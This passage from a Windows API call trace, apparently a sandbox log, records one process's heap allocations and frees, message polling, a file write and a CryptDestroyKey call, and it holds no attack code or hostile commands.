hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0185.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0185.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe880) returned 0x3c1a268 [0185.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0185.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0185.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bfd158 | out: hHeap=0x970000) returned 1 [0185.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0185.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0185.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0185.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0185.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0185.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe880) returned 0x3bfd158 [0185.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c1a268 | out: hHeap=0x970000) returned 1 [0185.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0185.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe880) returned 0x3c1a268 [0185.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bfd158 | out: hHeap=0x970000) returned 1 [0185.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0185.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0185.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0185.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0185.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0185.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0185.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0185.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0185.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0185.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0185.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0185.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0185.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0185.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0185.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0185.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0185.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0185.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0185.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0185.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0185.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0185.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0185.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0185.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0185.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0185.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0185.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0185.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0185.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0185.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0185.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0185.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0185.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bee8d0 | out: hHeap=0x970000) returned 1 [0185.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0185.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0185.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0185.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0185.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0185.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0185.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0185.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0185.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0185.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0185.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0185.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0185.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0185.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0185.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0185.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0185.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0185.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0185.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0185.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0185.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0185.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0185.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c0b9e0 | out: hHeap=0x970000) returned 1 [0185.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0185.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0185.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0185.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0185.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0185.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0185.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0185.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0185.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0185.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0185.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0185.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0185.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0185.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0185.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0185.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0185.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0185.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f328a0 | out: hHeap=0x970000) returned 1 [0185.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0185.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0185.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe880) returned 0x3c28af0 [0185.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c1a268 | out: hHeap=0x970000) returned 1 [0185.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0185.558] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0185.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0185.558] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0185.558] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0185.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0185.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0185.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0185.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0185.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0185.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe880) returned 0x3c37378 [0185.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0185.560] WriteFile (in: hFile=0x2d0, lpBuffer=0x3c37378*, nNumberOfBytesToWrite=0xe880, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3c37378*, lpNumberOfBytesWritten=0x8cf5e4*=0xe880, lpOverlapped=0x0) returned 1 [0185.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0185.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c37378 | out: hHeap=0x970000) returned 1 [0185.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0185.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0185.564] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0185.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0185.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0185.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0185.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0185.564] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0185.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0185.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0185.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0185.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0185.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0185.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0185.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0185.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0185.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0185.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0185.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0185.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0185.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0185.565] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0185.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0185.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e28 [0185.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0185.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0185.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0185.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0185.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0185.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0185.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0185.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0185.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0185.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0185.566] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0185.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0185.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0185.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0185.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0185.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0185.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0185.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0185.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0185.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0185.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0185.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0185.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0185.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0185.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0185.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0185.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0185.567] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0185.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0185.567] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0185.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0185.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0185.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0185.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0185.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0185.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0185.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0185.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0185.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0185.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0185.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0185.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0185.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0185.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0185.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0185.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0185.568] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0185.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0185.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0185.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0185.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0185.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0185.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0185.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0185.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0185.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0185.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0185.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0185.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0185.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0185.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e506e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0185.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0185.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0185.569] CryptDestroyKey (hKey=0xa87550) returned 1 [0185.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0185.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0185.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0185.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0185.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0185.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0185.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0185.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0185.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0185.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0185.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0185.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0185.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0185.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0185.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0185.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0185.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0185.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0185.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0185.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0185.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0185.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0185.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0185.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0185.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: 